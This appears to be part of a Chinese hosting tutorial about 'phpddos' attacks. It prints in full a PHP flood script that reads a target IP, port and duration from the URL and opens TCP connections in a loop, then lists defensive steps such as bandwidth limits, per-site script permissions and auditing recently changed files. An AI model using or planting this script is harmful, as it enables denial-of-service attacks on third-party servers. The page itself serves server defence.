西部数码主机 | 阿里云主机| 虚拟主机 | 服务器 | 返回乐道官网
当前位置: 主页 > php教程 > 其他 >

被phpddos服务器宕机,如何防御?(2)

时间:2012-01-27 19:23来源:未知 作者:好模板 点击:
还有: ? php ini_set(display_errors,Off); $ packets = 0 ; $ ip =$_GET['ip']; $ port =$_GET['port']; set_time_limit(0); ignore_user_abort(FALSE); $ exec_time =$_GET['time']; $ time time =time(); pri

还有:

 

  1. <?php 
  2. ini_set("display_errors", "Off"); 
  3. $packets = 0
  4. $ip = $_GET['ip']; 
  5. $port = $_GET['port']; 
  6. set_time_limit(0); 
  7. ignore_user_abort(FALSE); 
  8. $exec_time = $_GET['time']; 
  9. $timetime = time(); 
  10. print "状态 : 正常运行中.....<br>"; 
  11. $max_time = $time+$exec_time; 
  12. while(1){ 
  13. $packets++; 
  14.         if(time() > $max_time){ 
  15.                 break; 
  16.         } 
  17.          
  18.         $fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0);        
  19. echo "================================================<br>"; 
  20. echo "  <font color=blue>www.phpddos.com<br>"; 
  21. echo "  SYN Flood 模块<br>"; 
  22. echo "  作者:ybhacker<br>"; 
  23. echo "  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>"; 
  24. echo "================================================<br><br>"; 
  25. echo "  攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>"; 
  26. echo "  攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>"; 
  27. echo "  攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>"; 
  28. echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; 
  29. ?> 

 

这明显是程序采用fsockopen 发送TCP UDP包, 不断的发送TCP UDP 包,这就是DDOS攻击。

但是局限于IIS程序池环境下,威力不是很明显,最多是让IIS假死,不会产生几百G流量让整个机房都受影响!当然,若是机器很多,达到几千个机器同时发送这样PHPDDOS,被攻击IP 网站肯定也是无法访问的。黑客的目的就是如此!

到网上找到不少文章资料,但是一一尝试都不完美,禁PHP函数组建,会引起程序的不兼容,封堵所有UDP端口,会引起系统软件无法向外通信。好模板推荐的办法:

1.  限制IIS上所有站点的带宽。

2.  网站单站点控制好脚本权限,是给ASP的就给ASP,绝对不要给NET等权限。 不同脚本开不同权限,若全开了,权限无法完美控制。

3. 不用网上通用的cms系统,因为源码开放的,可能黑客早已经通读代码发觉出漏洞。往往官方封堵也不及时!真的要用也得删除不需要的组建,比如ECSHOP程序,一定要限制好缓存目录的权限,dedecms要限制图片后台缓存文件夹的权限,删除文件管理组件等。

4. 遇到PHPDDOS,停止所有IIS站点,一个一个排查。从最近修改过的文件开始通读。

5.  临时解决办法,使用星外的IPS工具包封堵。大家网上搜索下。 但是不建议。

6. 养成良好的维护习惯,经常维护更新机器资源。控制带宽使用。

 

(责任编辑:好模板)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------